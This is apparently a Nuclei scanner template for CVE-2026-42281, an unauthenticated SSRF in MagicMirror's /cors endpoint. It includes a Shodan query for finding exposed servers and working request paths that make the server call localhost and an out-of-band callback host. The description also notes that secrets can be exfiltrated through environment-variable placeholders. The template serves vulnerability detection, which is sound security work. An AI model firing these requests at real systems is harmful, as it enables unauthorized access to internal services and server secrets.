An unauthenticated Server-Side Request Forgery (SSRF) vulnerability in the /cors endpoint allows any remote attacker to force the MagicMirror² server to perform arbitrary HTTP requests to internal networks, cloud metadata services, and localhost services. The endpoint also expands environment variable placeholders (VAR_NAME), enabling exfiltration of server-side secrets.
PoC
id: CVE-2026-42281
info:
name: MagicMirror <= 2.35.0 - Server-Side Request Forgery
author: aleff-github
severity: critical
description: |
An unauthenticated Server-Side Request Forgery (SSRF) vulnerability in the /cors endpoint allows any remote attacker to force the MagicMirror² server to perform arbitrary HTTP requests to internal networks, cloud metadata services, and localhost services. The endpoint also expands environment variable placeholders (VAR_NAME), enabling exfiltration of server-side secrets.
impact: |
A remote unauthenticated attacker can force the MagicMirror server to request localhost, internal network, and cloud metadata endpoints. In affected configurations, the endpoint can return server-side responses to the attacker.
remediation: |
Upgrade MagicMirror to version 2.36.0 or later.
reference:
- https://github.com/advisories/GHSA-ph6f-2cvq-79hq
- https://github.com/MagicMirrorOrg/MagicMirror/security/advisories/GHSA-ph6f-2cvq-79hq
- https://github.com/MagicMirrorOrg/MagicMirror/releases/tag/v2.36.0
- https://osv.dev/vulnerability/GHSA-ph6f-2cvq-79hq
classification:
cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N
cvss-score: 9.2
cve-id: CVE-2026-42281
epss-score: 0.01676
epss-percentile: 0.76148
cwe-id: CWE-918
metadata:
max-request: 2
verified: true
product: magicmirror
vendor: magicmirrororg
shodan-query: 'http.title:"MagicMirror"'
tags: cve,cve2026,magicmirror,ssrf,unauth,oast,oob
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}"
host-redirects: true
max-redirects: 2
matchers:
- type: word
part: body
words:
- "MagicMirror"
internal: true
- method: GET
path:
- "{{BaseURL}}/cors?url=http://127.0.0.1:8080/version"
- "{{BaseURL}}/cors?url=http://{{interactsh-url}}/version"
stop-at-first-match: true
matchers-condition: or
matchers:
- type: dsl
name: version
dsl:
- regex('^(?:[01]\.[0-9]+\.[0-9]+|2\.(?:[0-9]|[12][0-9]|3[0-5])\.[0-9]+)\s*$', body)
- status_code == 200
condition: and
- type: dsl
name: dns
dsl:
- "contains(interactsh_protocol,'dns')"
- status_code == 200
condition: and
# digest: 4a0a0047304502201f7e10cd769797bc9282e4fea9b5ae0ed59daaddbdbee373c91f1b2a648f29e4022100a45c5c2cdd49b655e076a79fce5436882d020dd31212623b3d64cfead5853566:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.